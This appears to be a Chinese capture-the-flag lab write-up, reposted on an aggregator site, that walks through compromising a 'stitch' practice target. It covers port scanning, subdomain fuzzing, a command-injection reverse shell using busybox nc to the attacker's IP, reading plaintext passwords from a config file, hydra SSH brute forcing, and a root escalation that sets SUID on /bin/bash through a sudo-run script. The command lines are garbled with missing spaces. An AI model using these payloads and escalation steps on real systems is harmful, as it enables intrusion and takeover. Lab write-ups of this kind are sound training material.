当前位置: 首页 > news >正文

stitch靶场学习笔记

    • 正文
      • 1、端口扫描
      • 2、域名重定向
      • 3、NC反弹
      • 4、文件查找
      • 5、iiiii用户登录
      • 6、/HOME下多用户筛选
      • 7、多用户爆破
      • 8、iot_runner程序漏洞利用

正文

kali攻击机地址:192.168.1.4
靶场地址:192.168.1.19

1、端口扫描

在kali里,使用nmap工具:

nmap-sV-v-T4-A192.168.1.19


22和80端口是开放的。进入网页,发现域名stitch.dsz

2、域名重定向

修改kali中hosts:

vi/etc/hosts

进入hosts文件里,添加:

192.168.1.19 stitch.dsz

:wq!退出,重新访问http://stitch.dsz,发现域名重定向了:

使用子域名扫描工具:

wfuzz-w/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt-ustitch.dsz-H'Host:FUZZ.stitch.dsz'--hw1348

扫出来3个子域名,http://mail.stitch.dszhttp://dog.stitch.dszhttp://iot.stitch.dsz:

重新编辑kali里面的/etc/hosts文件:

192.168.1.19 stitch.dsz dog.stitch.dsz mail.stitch.dsz iot.Stitch.dsz

顺便修改windows下的Hosts文件:

C:\Windows\System32\drivers\etc\hosts

3、NC反弹

登录http://iot.stitch.dsz/,爆破用户名和密码的时候,可以对用户名构造nc连接语句:

;busyboxnc192.168.1.44444-e/bin/bash;


调整格式:

/usr/bin/script-qc/bin/bash /dev/null CTRL+Z stty raw -echo;fgreset xtermcd..find./

4、文件查找

/www目录下有个./dog/config.php文件:

可以发现里面存了一堆密码:

3c4900896d92da 3c4900896d92da789abc s3cur3P@ssw0rd

5、iiiii用户登录

先拿iiiii:3c4900896d92da对应的用户名、密码远程访问iiiii用户:

su- iiiii

6、/HOME下多用户筛选

筛选/home目录下的所有用户:

#写法1ls-al|awk'{print $NF}'#写法2,输出结果跳过前三行ls-al|awk' NR>3 {print $NF}'

7、多用户爆破

hydra-Lusr.txt-Ppass1.txt ssh://192.168.1.19-I-enrs


切换iotuser用户后,发现可以执行iot_runner的脚本:

8、iot_runner程序漏洞利用

iotuser用户下操作:

cd/tmpvia.sh IOT#chmod+s /bin/bashchmod600/tmp/a.sh


iiiii用户下操作:

sudo/usr/bin/push_iot /tmp/a.sh


iotuser用户下操作:

sudo/usr/bin/iot_runner a.shbash-p


大致意思解释 :
(1)在iotuser下:创建恶意脚本

cd/tmp# 进入临时目录(所有人可写)via.sh# 创建脚本 a.sh

脚本内容最关键

chmod +s /bin/bash
  • chmod +s:给文件设置SUID 权限
  • /bin/bash:系统的 bash 命令行工具
  • 效果:让/bin/bash变成任何人运行都直接获得 root 权限

(2)设置脚本权限

chmod600/tmp/a.sh
  • 让脚本只能被iotuser读写
  • 避免被其他用户修改或删除

(3)在iiiii用户下:把脚本推给 iot_runner

sudo/usr/bin/push_iot /tmp/a.sh

作用:

  • /tmp/a.sh放到iot_runner可以执行的位置
  • 让后面的iot_runner能找到并运行它

( 4)回到iotuser以 root 权限执行恶意脚本

sudo/usr/bin/iot_runner a.sh
  1. iot_runnerroot 权限运行

  2. 它执行了你的a.sh

  3. a.sh执行:

    chmod+s /bin/bash

    结果:/bin/bash 获得了 SUID root 权限


(5)最终:拿到 root 权限

bash-p

-p是什么?

  • 保留SUID 权限
  • 不降级权限
  • 直接以root身份打开 shell

执行完这一句,你就已经从普通用户 → 变成 root了!

http://www.jsqmd.com/news/854987/

相关文章:

  • 算法(移动零)
  • 湖北高空作业车技术选型要点与合规租赁实操解析 - 优质品牌商家
  • Linux系统开机启动模式
  • 智能零能耗建筑系统一体化与性能优化【附代码】
  • 如何在3分钟内实现专业级AI背景移除:OBS插件终极指南
  • 武威本地专业承接各类项目落地 本土资深班组全程施工更靠谱
  • 外部系统调用SAP数据?用ABAP RFC函数搭个“桥梁”其实很简单(含Function Group创建避坑)
  • 穿云越巷的“全局视野”:NeurIPS 2026 论文深度解读《Seeing Across Skies and Streets: Feedforward 3D Reconstruction from
  • python学习笔记 | 11.2、面向对象高级编程-使用@property
  • 菩瓦纽课业平台:精准追踪错题根源,让每一份努力都有回响
  • 蜂窝板幕墙技术全解析:四川铝单板/四川铝方管/四川铝方通/型材铝方通/外墙格栅铝方管/外墙蜂窝板/选材 - 优质品牌商家
  • 保姆级图解:用Wireshark抓包分析PCI总线上的读写时序(附实战案例)
  • 合肥瓷砖批发TOP5全面评测|瓷砖选购避坑指南 - 行业深度观察C
  • 告别外挂SDRAM!用SWM34SRET6这颗内置8MB内存的MCU驱动4.3寸屏,成本直降
  • 聚焦新型有效成分,守护爱宠健康
  • 中华民族站起来了-《AI驱动上下五千年:从结绳记事到智能纪元》-九品中正制——一个失败的“人才推荐算法“
  • 保姆级教程:用ENVI 5.3搞定Landsat8影像的辐射与大气校正(附海淀区裁剪实例)
  • XRSLAM:开源视觉惯性里程计库,赋能移动端AR应用开发
  • 从模拟到数字:Sigma-Delta调制器如何成为现代ADC的降噪利器?
  • 杭州年份茅台回收机构实测对比:专业度与服务解析 - 优质品牌商家
  • 告别官方臃肿,B站TV版新选择:MyBili v1.3.4 深度体验与下载指南
  • 菩瓦纽课业平台:少刷无用题,专攻薄弱点,让高效提分不内卷
  • 不止于对话:将本地ChatGLM-6B接入Unity游戏,打造你的专属AI NPC
  • 谷歌开发者大会发布多项AI更新:Gemini升级、搜索改版,加速AI生态商业化
  • 融合不确定性的智能车行车态势评估与交互性决策控制方法【附模型】
  • 深度观察:从静态路牌到智能交互,城市导视系统的三次进化
  • 深度解析msvcr120.dll丢失诱因:误删、病毒、运行库损坏逐一排查修复
  • SolidWorks 服务器资源不够 10 人用?云飞云智能分配云桌面,一人一桌面不打架
  • llychaom3u8-downloader:m3u8格式视频多线程下载工具
  • 5大过程组、十大知识领域和49个子过程的英文拼写